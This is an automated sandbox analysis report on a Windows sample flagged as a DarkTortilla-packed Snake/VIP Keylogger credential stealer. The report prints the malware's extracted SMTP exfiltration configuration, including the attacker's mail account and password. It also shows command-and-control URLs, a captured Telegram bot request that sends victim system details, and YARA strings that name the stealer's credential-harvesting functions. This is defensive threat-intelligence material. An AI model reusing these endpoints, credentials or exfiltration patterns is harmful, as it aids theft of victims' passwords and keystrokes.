Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pbCN4g6sN5.exe

Overview

General Information

Sample name:pbCN4g6sN5.exe
renamed because original name is a hash value
Original sample name:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f.exe
Analysis ID:1586029
MD5:7d88e5bad194e89ada135543169da996
SHA1:929a742475ae4b93a5e164b1d565d7d7f78f6b62
SHA256:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f
Tags:exeuser-adrian__luca
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pbCN4g6sN5.exe (PID: 5696 cmdline: "C:\Users\user\Desktop\pbCN4g6sN5.exe" MD5: 7D88E5BAD194E89ADA135543169DA996)
    • InstallUtil.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2dff0:$a1: get_encryptedPassword
        • 0x2e578:$a2: get_encryptedUsername
        • 0x2dc63:$a3: get_timePasswordChanged
        • 0x2dd7a:$a4: get_passwordField
        • 0x2e006:$a5: set_encryptedPassword
        • 0x30d22:$a6: get_passwords
        • 0x310b6:$a7: get_logins
        • 0x30d0e:$a8: GetOutlookPasswords
        • 0x306c7:$a9: StartKeylogger
        • 0x3100f:$a10: KeyLoggerEventArgs
        • 0x30767:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.pbCN4g6sN5.exe.36a2f30.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            0.2.pbCN4g6sN5.exe.365d150.3.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              0.2.pbCN4g6sN5.exe.4b30000.4.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    Click to see the 21 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-08T16:33:10.683264+010028033053Unknown Traffic192.168.2.449836188.114.97.3443TCP
                    2025-01-08T16:33:15.157202+010028033053Unknown Traffic192.168.2.449869188.114.97.3443TCP
                    2025-01-08T16:33:18.079410+010028033053Unknown Traffic192.168.2.449892188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-08T16:33:08.959347+010028032742Potentially Bad Traffic192.168.2.449821132.226.8.16980TCP
                    2025-01-08T16:33:10.111995+010028032742Potentially Bad Traffic192.168.2.449821132.226.8.16980TCP
                    2025-01-08T16:33:11.537491+010028032742Potentially Bad Traffic192.168.2.449841132.226.8.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-08T16:33:21.949552+010018100071Potentially Bad Traffic192.168.2.449920149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: pbCN4g6sN5.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                    Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                    Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                    Found malware configuration
                    Source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
                    Multi AV Scanner detection for submitted file
                    Source: pbCN4g6sN5.exeReversingLabs: Detection: 71%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: pbCN4g6sN5.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: pbCN4g6sN5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
                    Source: pbCN4g6sN5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BEF8E9h5_2_02BEF630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 02BEFD41h5_2_02BEFA88

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49920 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49841 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49821 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49869 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49836 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49827 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 15:33:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2385906795.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBiq
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
